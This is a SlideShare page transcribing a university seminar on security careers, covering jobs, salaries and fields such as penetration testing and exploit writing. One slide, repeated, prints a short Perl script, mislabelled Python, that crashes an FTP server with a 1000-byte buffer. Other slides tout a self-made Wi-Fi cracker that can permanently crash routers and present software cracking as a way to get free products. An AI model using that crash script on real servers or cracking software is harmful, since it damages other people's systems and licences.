Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Upcoming SlideShare
Loading in...5
×
 

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

on

  • 1,045 views

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with ...

Presentation on topics beyond the conventional ethical hacking , discusses job factors and scope in the security field :) this was presented in LPU (Lovely Professional University) as a Seminar with attendees over 200. Meet m e at FB if u want it fb/nipun.jaswal

Statistics

Views

Total Views
1,045
Views on SlideShare
1,037
Embed Views
8

Actions

Likes
3
Downloads
41
Comments
0

3 Embeds 8

http://www.linkedin.com 4
http://192.168.6.179 2
https://www.linkedin.com 2

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd Presentation Transcript

  • Life Beyond Ethical Hacking“ The Actual Information Security” By :-Nipun Jaswal (CSA , HCF Info sec Pvt. Ltd. )
  • Acknowledgements Dr. H.S Johal Ms. Himanshi
  • Lil About My Self Certified With C|EH , CISE , AFCEH Associated With over 9 Companies Ambassador , EC-COUNCIL Creator Of India’s Fist DLP on Web Application Penetration Testing Course Student @ LPU  Tested Over 90+ Servers Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
  • Lets Go Old School ,What is EthicalHacking? Breaking Into Devices , Networks Legally. Securing Servers, Recovering Emails etc. But the Question Remains ! Where to get these jobs ?
  • Jobs And Stats
  • Why More Jobs and Less People ? Emerging Technology Still Register Work Don’t want to spend money Find it too difficult People Feel they can learn hacking in 2 days workshop :-P No Proper facilities of required courses
  • Salary Packages Normal B.tech : 300K-400K BPO : 100K-250K DEVELOPMENT : 300K-700K SECURITY : 600K-1300K
  • Beyond So Called “Ethical Hacking” Web Application Penetration testing Exploit Writing Reverse Engineering Malware Analysis Computer Forensics Protocol Analysis
  • Why To Go Beyond Ethical Hacking? Jobs For Ethical Hacker:- Trainer Trainer Trainer Trainer And Trainer Salary Around : 15K + Incentives
  • Jobs Beyond Ethical Hacking:- Jobs For Hackers:- Researchers Technical Heads Penetration testers Forensic Investigators Salary Around: 300-400K Per Month 
  • Benefits  of not Being a Hacker
  • Benefits  of Being a Hacker I M UR WORST NIGHTMARE :-P
  • How To Let Your Dreams Come True? Some Highly Paid Fields :- WAPT – Involves Testing of Web Applications , Websites , Servers , Source code Auditing . Exploit Writing – Finding Vulnerabilities in soft wares and Possibly to Exploit the Software . Reverse Engineering :- Software cracking , Patches , Modifying Features of an end product
  • How To Let Your Dreams Come True? Some Highly Paid Fields :- Wireless Testing :- Involves Network Security infrastructure build up , Managing Networks , System Administration etc. Projects :- Good At Coding? Show to the whole world . Forensics : Highest Paid Job in the entire list  Takes A lot , And Pays A lot
  • Why We Need More People ? Source: Indian Express
  • Why We Need More People ? Source: Times Of India
  • Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
  • Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
  • Norton India Hacked !! Source: Private
  • Norton India’s Database Hacked !! Source: Private
  • Norton India’s Database Hacked !! Source: Private
  • The Biggest Of All… Anonymous!! Source: National Post
  • Now Beyond The Word ‘Ethical’ Web Application Penetration Testing :-• Find Bugs In Web Applications – Custom Made , Open Source Applications .• Bugs which may compromise the security , make it vulnerable , helps an attacker to steal sensitive information• Now How To Perform 1 Out of 300 Tests In Web Applications Pen- Test?• Lets See a Simple Example – SQL Injection Bypass
  • Rise Of The Web Applications
  • Fasten Your Seat Belts , Its Showtime DEMO
  • Now Beyond The Word ‘Ethical’ Exploit Writing• Potentially writing codes to exploit a vulnerability .• Highly Paid in Soft wares are vulnerable to Exploits , which further may lead to compromise of the entire system.• Requirement : C,C++, Perl , Python , Ruby , Assembly language
  • Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Serveruse strict;use Socket;my $junk = "x41" x1000;my $host = shift || ‘192.168.15.1;my $port = shift || 200;my $proto = getprotobyname(tcp);my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socketn";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $portn";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payloadn";print SOCKET $junk."n";print "[+] Payload sentn";close SOCKET or die "close: $!";
  • Now Beyond The Word ‘Ethical’ Simplest of The Exploit in Python- Crashing A Secure Port FTP Serveruse strict;use Socket;my $junk = "x41" x1000;my $host = shift || ‘192.168.15.1;my $port = shift || 200;my $proto = getprotobyname(tcp);my $iaddr = inet_aton($host);my $paddr = sockaddr_in($port, $iaddr);print "[+] Setting up socketn";socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";print "[+] Connecting to $host on port $portn";connect(SOCKET, $paddr) or die "connect: $!";print "[+] Sending payloadn";print SOCKET $junk."n";print "[+] Payload sentn";close SOCKET or die "close: $!";
  • Now Beyond The Word ‘Ethical’ Prices for Various Exploits
  • Now Beyond The Word ‘Ethical’ Reverse Engineering• Editing the final software to find serials keys , stop the online authentications ,• Mostly used by pirates• Sometimes used to edit the features of a final software• Make your Life easier with free products 
  • Now Beyond The Word ‘Ethical’ Wireless Penetration Testing• Involves Auditing of Network Security Over Wireless• Installation of Servers And Security Devices• Crack proofing Wireless Passwords• Highly paid• Requires Networking Background
  • INSANITY WIFI CRACKER Insanity Wi-fi Cracker• Developed By me and my Friends for minor project• Automates the cracking of various wifi securities• Performs self MITM attack• DOS Service Can Crash the Routers For Ever :-P• Even an 8 Years old can press the button ‘c’ for cracking and no. for a particular AP to crack
  • Wi-fi Cracking At a Click Of a Button DEMO
  • So A One Last Question , Wanna go this ?
  • Or Wanna Go This ?
  • After AllIt’s your Career |Handle it with care|
  • Any Questions ?
  • ContactEmail :info@nipunjaswal.comwww.nipunjaswal.comwww.facebook.com/nipun.jaswalwww.hatcon.inwww.hcf.co.inwww.starthack.comwww.cyber-rog.com/h3llwww.pentest.co.in